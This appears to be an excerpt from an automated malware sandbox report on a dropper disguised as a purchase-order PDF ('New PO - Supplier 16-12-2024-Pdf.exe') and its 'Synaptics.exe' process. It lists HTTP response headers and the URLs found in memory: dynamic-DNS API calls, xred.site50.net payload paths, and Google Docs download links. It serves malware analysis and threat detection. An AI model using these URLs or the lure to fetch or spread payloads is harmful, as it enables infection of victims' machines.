                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Wzt7tSMABsoDAE84dT-0QLNTX8nq8OlzPUJE6xflE2rPXJKqDgemGV6PW41PJG-JzmfGK8NsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:07 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-PP3A5bt3FxO7y234y231sQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7i12liUKtaDnQYvTLzyehHNKiQ5l1w4Zx-88tWmS3pEMTt_lc1CX5iEF_7_kNg9BO-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:08 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-VoOUDqQX_woJbgsWpFf5mw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7pQmvK7rIgovYK0kF5mtey_G-PzyALnWGOpQnJFItVyAcUpL3uR8rNFyfvevBFCvORContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:16 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-SELyxZVyxKIac3XXmW1Pfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6R6v887du7yFWK-XOO73OpzxQKUe_nHEJIzLTszQ79hYMngt-TmKzYKyg6p_GJkr3wContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:16 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-FHDGDe9qD_cptlMcLJboGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: Synaptics.exe, 00000003.00000002.2645686279.00000000005FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                              Source: Synaptics.exe, 00000003.00000002.2645686279.00000000005FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc6135629787
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
                              Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                              Source: Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                              Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini0
                              Source: Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                              Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                              Source: Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.000000000060A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.00000000006AC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2688843389.000000000EFBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/Data
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/ckground-size:100%
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/S
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/load?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2694610616.000000001023E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2711091391.000000001968E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2699875581.0000000012D7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2668420509.000000000ACFE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                              Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                              Source: Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000003.00000002.2653861362.0000000006DAE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2693179119.000000000F97E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2712821501.000000001ABCE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2713679874.000000001B34E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2710203910.0000000018B4E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2714252208.000000001B84E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2709697334.00000000188CE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2700359770.000000001327E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2701045920.00000000138CE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2702917525.00000000142CE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2707229055.0000000016E8E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649194042.0000000004EDE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2664466381.0000000007EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2666978489.0000000009B7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2669872668.000000000BBFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2700830560.000000001364E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674839457.000000000E2BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2706218501.000000001648E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2704816233.000000001544E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2694444435.00000000100FE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2655247190.0000000007080000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#Y
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#s
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#z
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2655247190.0000000007080000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                              Source: Synaptics.exe, 00000003.00000002.2645686279.000000000063A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$:
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.00000000006AC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.00000000006AC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.00000000006AC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-8
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-H
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-UA-F$gC
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.P
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cy
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2655247190.0000000007080000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download//www
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/X
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/x
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0%/10m
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download00
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2655247190.0000000007080000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1y
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.000000000063A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2S&
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2q6
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2x
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.00000000006AC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3X
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3lss
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3xi
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4F
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4dp.pJ
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download52
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download54px;
